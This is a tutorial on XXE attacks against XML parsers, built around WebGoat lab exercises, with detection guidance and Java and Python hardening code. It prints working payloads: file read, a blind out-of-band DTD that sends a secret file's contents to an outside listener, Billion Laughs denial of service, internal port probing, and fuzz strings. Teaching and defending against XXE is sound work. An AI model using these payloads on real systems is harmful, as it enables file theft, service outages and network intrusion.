Web Security: XXE (external-general-entities)

0x01 Introduction

A quick search of CVEs turns up plenty of XXE issues.

XXE stands for XML External Entity.

A DTD (Document Type Definition) defines the legal building blocks of an XML document: it describes the document structure in terms of a set of legal elements.

General entities

Can be referenced inside the XML document, e.g. &js;

 

    <?xml version="1.0" standalone="yes" ?>
    <!DOCTYPE author [
    <!ELEMENT author (#PCDATA)>
    <!ENTITY js "Jo Smith"> <!-- js is an internal entity declared in the DTD -->
    ]>
    <author>&js;</author> <!-- referenced via &js; -->

External entities

Fetch external resources (not declared inside the XML itself); usable both as general entities and as parameter entities.

 

    <?xml version="1.0" encoding="utf-8"?>
    <!-- DTD definition: root is the declared external entity -->
    <!DOCTYPE user [
    <!ENTITY root SYSTEM "file:///c:\">
    ]>
    <comment>
    <text>&root;Hello</text> <!-- &root; reference -->
    </comment>
    <!-- An entity can also be defined with the PUBLIC keyword to read a public resource:
         <!ENTITY name PUBLIC "any_text" "URI/URL"> -->

External entities support protocols such as http and file.

Parameter entities

Can be used inside the DOCTYPE declaration, and also inside the value of another entity definition.

    <?xml version="1.0"?>
    <!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://192.168.3.112:9090/WebWolf/files/attack.dtd">
    %remote;
    ]>
    <comment>
    <text>test&ping;</text>
    </comment>
    <!-- Other forms:
         <!ENTITY % name "Hello World">
         <!ENTITY % name "Hello %myEntity;"> -->

With the entity concepts covered, the principle of the vulnerability is basically clear: information is obtained through external entities (http, ftp).
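To see the three entity kinds the way a parser sees them, here is an added Python example (not part of the original article) that feeds the three samples above to Python's expat and reports each declared entity as internal general, external general or parameter. It installs no external-entity handler and leaves parameter-entity parsing off, so expat records the declarations but fetches nothing. The three documents are constructed copies of the snippets above with the annotations removed.

```python
import xml.parsers.expat

# Constructed copies of the three samples above, annotations removed.
INTERNAL_GENERAL = b"""<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
<!ELEMENT author (#PCDATA)>
<!ENTITY js "Jo Smith">
]>
<author>&js;</author>"""

EXTERNAL_GENERAL = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE user [
<!ENTITY root SYSTEM "file:///c:\\">
]>
<comment><text>&root;Hello</text></comment>"""

PARAMETER = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.3.112:9090/WebWolf/files/attack.dtd">
%remote;
]>
<comment><text>test&ping;</text></comment>"""


def inventory_entities(document):
    """Parse with expat and classify every entity the DTD declares.

    No ExternalEntityRefHandler is installed and parameter-entity parsing is set to
    NEVER, so file:// and http:// identifiers are reported, never followed."""
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    entities, text = [], []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # An entity with a SYSTEM or PUBLIC identifier is external; a literal value is internal.
        scope = "external" if (system_id or public_id) else "internal"
        role = "parameter" if is_parameter else "general"
        entities.append({"name": name, "kind": f"{scope} {role}", "value": value,
                         "system_id": system_id, "public_id": public_id})

    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = text.append   # collects expanded text content
    error = None
    try:
        parser.Parse(document, True)
    except xml.parsers.expat.ExpatError as exc:
        error = str(exc)
    return {
        "entities": entities,
        "text": "".join(text),
        "parse_error": error,
        # Any external declaration is the signal a reviewer or a request filter cares about.
        "references_external": any(e["kind"].startswith("external") for e in entities),
    }


if __name__ == "__main__":
    for label, doc in (("internal general", INTERNAL_GENERAL),
                       ("external general", EXTERNAL_GENERAL),
                       ("parameter", PARAMETER)):
        print(label, inventory_entities(doc))
```

The internal entity sample expands to the text "Jo Smith", while the other two only yield a declaration record with the identifier that would have been fetched; this is exactly the information a pre-parse filter needs in order to refuse a document before any resolution takes place.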

0x02 Impact

Arbitrary file read

Because external entities support the ftp protocol, a payload can be constructed to obtain directory and file information.

See webgoat8 xxe stage 3 for details; exploitation is fairly simple.

 

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE user [<!ENTITY root SYSTEM "file:///c:\"> ]>
    <comment>
    <text>&root;xxe</text>
    </comment>

If there is no echo in the response, exploit it via blind XXE (out-of-band); see webgoat8 xxe stage 7.

Set up a server (A) to receive the data sent in HTTP requests; server A hosts attack.dtd.

The target parses the XML containing the payload, the external entity loads attack.dtd, and the data read is then sent to A.

attack.dtd

 

    <?xml version="1.0" encoding="UTF-8"?>
    <!-- parameter entity plus external entity: reads a file on the target -->
    <!ENTITY % file SYSTEM "file:///c:/Users/derek/.webgoat-8.0.0.M24/XXE/secret.txt">
    <!-- parameter entity whose value declares an external entity that contacts server A and sends the file content -->
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.3.103:9091/landing?text=%file;'>">
    %all;

Payload:

    <?xml version="1.0"?>
    <!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://192.168.3.103:9091/files/admin1/attack2.dtd">
    %remote;
    ]>
    <comment>
    <text>test123---&send;</text>
    </comment>

DoS attack

By constructing malicious entities, the XML document expands exponentially when parsed; the server exhausts its resources during parsing and is denied service. This example is the well-known Billion Laughs attack.

Payload:

 

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
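An added Python example, not from the original article, that estimates how large the payload above becomes without ever expanding it: it reads the internal entity declarations, computes each entity's expanded size recursively with memoisation and cycle detection, and compares the document body's expansion against a budget. The payload is a constructed copy of the one above; the byte and amplification limits are assumptions chosen for illustration.

```python
import re

# Constructed copy of the Billion Laughs payload shown above.
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"""

# Only internal general entities with a double-quoted literal value are matched;
# SYSTEM/PUBLIC and parameter entities do not contribute to expansion here.
ENTITY_DECL = re.compile(r'<!ENTITY\s+([A-Za-z_][\w.\-]*)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_][\w.\-]*);')
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}   # each expands to one character


def estimate_expansion(document):
    """Return {entity name: expanded size in characters, 'body': expanded size of the
    content after the DTD}. Raises ValueError on a recursive entity definition."""
    entities = dict(ENTITY_DECL.findall(document))
    memo = {}

    def size_of(name, active):
        if name in memo:
            return memo[name]
        if name in active:
            raise ValueError(f"recursive entity reference: {name}")
        active.add(name)
        memo[name] = expanded_size(entities[name], active)
        active.discard(name)
        return memo[name]

    def expanded_size(text, active):
        total, pos = 0, 0
        for ref in ENTITY_REF.finditer(text):
            total += ref.start() - pos            # literal characters before the reference
            name = ref.group(1)
            if name in entities:
                total += size_of(name, active)
            elif name in PREDEFINED:
                total += 1
            else:
                total += len(ref.group(0))        # unknown entity: counted as written
            pos = ref.end()
        return total + len(text) - pos

    sizes = {name: size_of(name, set()) for name in entities}
    dtd_end = document.rfind("]>")
    body = document[dtd_end + 2:] if dtd_end >= 0 else document
    sizes["body"] = expanded_size(body, set())
    return sizes


def exceeds_expansion_budget(document, max_bytes=10_000_000, max_amplification=100):
    """Reject when the expanded body exceeds an absolute size or an amplification
    factor relative to the document itself (assumed limits)."""
    body = estimate_expansion(document)["body"]
    return body > max_bytes or body > max_amplification * len(document)


def detects_recursion(document):
    """True if the entity graph contains a cycle, which a parser must also refuse."""
    try:
        estimate_expansion(document)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    sizes = estimate_expansion(BILLION_LAUGHS)
    print("lol9 expands to", sizes["lol9"], "characters")
    print("over budget:", exceeds_expansion_budget(BILLION_LAUGHS))
```

Each level multiplies the previous one by ten, so lol9 alone expands to three billion characters from a payload under a kilobyte; the estimator returns that number in microseconds, which is why a size or amplification budget applied before parsing is the cheap defence against this class of payload.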

Internal network probing

Because external entities support protocols such as ftp and http, they can be used to probe the internal network (hosts, ports), and even to brute-force accounts and passwords.

Host and port probing

 

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE user [<!ENTITY root SYSTEM "http://192.168.3.103:9090/index.html"> ]>
    <comment>
    <text>&root;xxe</text>
    </comment>

Trying it with the webgoat8 xxe example, treating webwolf as the internal-network machine.

Left: a reachable address; a parse error is returned.

 

    "javax.xml.bind.UnmarshalException\\n - with linked exception:
    \\n[javax.xml.stream.XMLStreamException:
    ParseError at [row,col]:[4,15]
    \\nMessage: http:\\/\\/192.168.3.103:9091\\/WebGoat]\\r\\n\\tat com.sun.xml.bind.v2.runtime.unmarshaller.UnmarshallerImpl.handleStreamEx

Right: the port is not open; the connection is refused, and the response time is noticeably longer.

 

    "javax.xml.bind.UnmarshalException\\n - with linked exception:
    \\n[javax.xml.stream.XMLStreamException:
    ParseError at [row,col]:[4,15]\\nMessage: Connection refused: connect

Remote code execution (RCE)

Targets a PHP environment with the expect extension installed; the outcome is judged from the returned error message, the response time and so on.

The payload is as follows; I did not bother setting up an environment for a concrete example.

 

    <?xml version="1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY test SYSTEM "http://ip:80/tets.txt">
    ]>
    <abc>&test;</abc>

 

0x03 Detection

Black box

  • Wherever XML is used to transmit data, XXE must be tested;
  • For some JSON transports, change the Content-Type and check whether XML can be injected;
  • Close tags with XML markup and check whether tampering is possible;
  • Single quotes, double quotes, comments, ampersands, external entity references:

    ' " & < > ]]>
    <!--
    <![CDATA[ / ]]> -
    <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/
    script<![CDATA[>]]>
    <!ENTITY test SYSTEM "http://ip:80/tets.txt">
  • XML Injection Fuzz Strings (fuzzing wordlist):
    https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt

White box

Audit the source code and check whether the XML processing disables entities. Commonly used XML parser classes:

  • DOM: import javax.xml.parsers.DocumentBuilder/DocumentBuilderFactory
  • Dom4j: import org.dom4j.io.SAXReader
  • JDOM: import org.jdom2.input.SAXBuilder
  • SAX: import javax.xml.parsers.SAXParser/SAXParserFactory
  • JAXB: import javax.xml.bind.Unmarshaller
  • StAX: import javax.xml.parsers.SAXParserFactory / javax.xml.stream.XMLStreamReader
  • javax.xml.transform.TransformerFactory

Besides the parsers listed above, some commonly used third-party components with XXE issues:

  • Spring OXM & Spring MVC (3.0.0 - 3.2.3)
  • Spring OXM (4.0.0.M1)
  • Spring MVC (4.0.0.M1 - 4.0.0.M2)
  • Apache POI (below 3.11, Excel parsing)
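As an added example for the white-box check (not the article's own tooling), the Python script below scans Java source for the parser imports listed above and for the hardening feature and property names from the defense section, and reports which files instantiate a parser without any of them. The Java snippets are constructed; the check matches feature-name literals only and does not verify the boolean passed alongside them, so it is a triage aid that tells a reviewer where to look, not a proof of safety.

```python
import re

# Parser entry points from the white-box list, mapped to their API family.
PARSER_IMPORTS = {
    "javax.xml.parsers.DocumentBuilderFactory": "DOM",
    "javax.xml.parsers.DocumentBuilder": "DOM",
    "org.dom4j.io.SAXReader": "Dom4j",
    "org.jdom2.input.SAXBuilder": "JDOM",
    "javax.xml.parsers.SAXParserFactory": "SAX",
    "javax.xml.parsers.SAXParser": "SAX",
    "javax.xml.bind.Unmarshaller": "JAXB",
    "javax.xml.stream.XMLStreamReader": "StAX",
    "javax.xml.stream.XMLInputFactory": "StAX",
    "javax.xml.transform.TransformerFactory": "Transformer",
}

# Feature/property names from the defense section. FULL settings disable DTDs outright;
# a PARTIAL group only disables external entities and counts when complete.
HARDENING = {
    "disallow-doctype-decl": "http://apache.org/xml/features/disallow-doctype-decl",
    "SUPPORT_DTD": "XMLInputFactory.SUPPORT_DTD",
    "external-general-entities": "http://xml.org/sax/features/external-general-entities",
    "external-parameter-entities": "http://xml.org/sax/features/external-parameter-entities",
    "load-external-dtd": "http://apache.org/xml/features/nonvalidating/load-external-dtd",
    "isSupportingExternalEntities": "javax.xml.stream.isSupportingExternalEntities",
}
FULL = {"disallow-doctype-decl", "SUPPORT_DTD"}
PARTIAL = ({"external-general-entities", "external-parameter-entities"},
           {"isSupportingExternalEntities"})

IMPORT_RE = re.compile(r"^\s*import\s+([\w.]+(?:\.\*)?)\s*;", re.MULTILINE)


def parser_apis(imports):
    """API families imported by a file; wildcard imports are matched by package."""
    apis = set()
    for imp in imports:
        if imp.endswith(".*"):
            pkg = imp[:-1]
            apis.update(api for cls, api in PARSER_IMPORTS.items() if cls.startswith(pkg))
        elif imp in PARSER_IMPORTS:
            apis.add(PARSER_IMPORTS[imp])
    return sorted(apis)


def audit_java_source(filename, source):
    """Triage record for one Java file: parsers used, hardening literals seen, verdict."""
    apis = parser_apis(IMPORT_RE.findall(source))
    found = sorted(name for name, literal in HARDENING.items() if literal in source)
    if not apis:
        verdict = "no XML parser"
    elif FULL & set(found):
        verdict = "hardened: DTD disabled"
    elif any(group <= set(found) for group in PARTIAL):
        verdict = "hardened: external entities disabled (verify booleans)"
    else:
        verdict = "REVIEW: XML parser without XXE hardening"
    return {"file": filename, "parsers": apis, "hardening": found, "verdict": verdict}


def audit_tree(files):
    """Audit a {filename: source} mapping, e.g. built by walking a checkout."""
    return [audit_java_source(name, src) for name, src in files.items()]


# Constructed sample sources (hypothetical files, not from any real project).
SAMPLE_FILES = {
    "ImportHandler.java": """\
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
public class ImportHandler {
    Document load(java.io.InputStream in) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        return dbf.newDocumentBuilder().parse(in);
    }
}
""",
    "SafeImportHandler.java": """\
import javax.xml.parsers.*;
import org.w3c.dom.Document;
public class SafeImportHandler {
    Document load(java.io.InputStream in) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf.newDocumentBuilder().parse(in);
    }
}
""",
    "FeedReader.java": """\
import org.dom4j.io.SAXReader;
public class FeedReader {
    void read(java.io.File f) throws Exception {
        SAXReader saxReader = new SAXReader();
        saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        saxReader.read(f);
    }
}
""",
    "Greeter.java": "public class Greeter { String hi() { return \"hi\"; } }\n",
}

if __name__ == "__main__":
    for report in audit_tree(SAMPLE_FILES):
        print(report["file"], report["parsers"], report["verdict"])
```

Files flagged REVIEW are the ones to read by hand; a feature name held in a String variable, as in the DocumentBuilderFactory sample in the defense section, is still found because the literal appears somewhere in the file, but the value passed to setFeature has to be confirmed by the reviewer.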

0x04 Defense

For defense, the best option is to disable DTDs outright;

if DTDs are required, disable external entities;

and validate and filter user input as needed.

  • DocumentBuilderFactory

 

    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    String FEATURE = null;
    try {
        FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
        dbf.setFeature(FEATURE, true);
        FEATURE = "http://xml.org/sax/features/external-general-entities";
        dbf.setFeature(FEATURE, false);
        FEATURE = "http://xml.org/sax/features/external-parameter-entities";
        dbf.setFeature(FEATURE, false);
        FEATURE = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
        dbf.setFeature(FEATURE, false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        ...
    } catch (XXXException e) { // e.g. ParserConfigurationException when a feature is unsupported
        ...
    }
  • XMLInputFactory

 

 

    XMLInputFactory xmlInputFactory = XMLInputFactory.newInstance();
    // This disables DTDs entirely for that factory
    xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
    // disable external entities
    xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

 

  • XMLReader

 

    XMLReader reader = XMLReaderFactory.createXMLReader();
    reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.
    reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXReader

 

    SAXReader saxReader = new SAXReader();
    saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXBuilder

 

    SAXBuilder builder = new SAXBuilder();
    builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
    builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    Document doc = builder.build(new File(fileName));
  • Unmarshaller

 

    // Disable XXE
    SAXParserFactory spf = SAXParserFactory.newInstance();
    spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    // Do the unmarshal operation
    Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),
                                    new InputSource(new StringReader(xml)));
    JAXBContext jc = JAXBContext.newInstance(Object.class);
    Unmarshaller um = jc.createUnmarshaller();
    um.unmarshal(xmlSource);
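The same policy as the Java configurations above, applied to Python's expat, as an added example that is not from the article: by default every DOCTYPE is rejected (the equivalent of disallow-doctype-decl); with allow_dtd=True internal entities still expand, but external general entities are never resolved and parameter entities are never parsed (the equivalent of external-general-entities and external-parameter-entities set to false). The documents used to exercise it are constructed copies of the text's samples.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document uses something the hardened policy forbids."""


def parse_hardened(document, allow_dtd=False):
    """Parse bytes or str under the hardened policy and return [(element, text), ...].

    allow_dtd=False: any DOCTYPE is refused (disallow-doctype-decl).
    allow_dtd=True: an internal DTD subset is accepted, but an external subset,
    external general entities and parameter entities are refused."""
    parser = xml.parsers.expat.ParserCreate()
    # Parameter entities are never parsed, so %remote;-style references load nothing.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    elements, open_elements = [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXML("DOCTYPE declarations are not accepted")
        if system_id is not None or public_id is not None:
            raise UnsafeXML("external DTD subsets are not accepted")

    def on_external_entity(context, base, system_id, public_id):
        # Reached for every external general entity reference; the resource is never fetched.
        raise UnsafeXML(f"external entity {system_id!r} refused")

    def on_start(name, attrs):
        open_elements.append([name, ""])
        elements.append(open_elements[-1])

    def on_end(name):
        open_elements.pop()

    def on_text(data):
        if open_elements:
            open_elements[-1][1] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(document, True)
    return [tuple(e) for e in elements]


def rejects(document, allow_dtd=False):
    """True if the hardened parser refuses the document."""
    try:
        parse_hardened(document, allow_dtd)
    except UnsafeXML:
        return True
    return False


# Constructed copies of the text's samples.
FILE_READ = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE user [<!ENTITY root SYSTEM "file:///c:\\"> ]>
<comment><text>&root;xxe</text></comment>"""

INTERNAL_ONLY = b"""<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [<!ENTITY js "Jo Smith">]>
<author>&js;</author>"""

PLAIN = b"<comment><text>hello</text></comment>"

if __name__ == "__main__":
    print(parse_hardened(PLAIN))
    print("file-read payload refused:", rejects(FILE_READ), rejects(FILE_READ, allow_dtd=True))
    print(parse_hardened(INTERNAL_ONLY, allow_dtd=True))
```

The default mode is the one to deploy: refusing DOCTYPE altogether removes external entities, parameter entities and entity expansion in a single check. The allow_dtd mode shows what the weaker "keep DTDs, disable external entities" configuration buys: the file-read payload is still refused at the &root; reference, but internal entity expansion, and with it the Billion Laughs risk, remains.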

References:

https://www.freebuf.com/articles/web/177979.html

https://www.freebuf.com/column/181064.html

https://www.freebuf.com/vuls/176837.html

https://www.freebuf.com/vuls/194112.html

https://xz.aliyun.com/t/2571

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_Security_Cheat_Sheet.md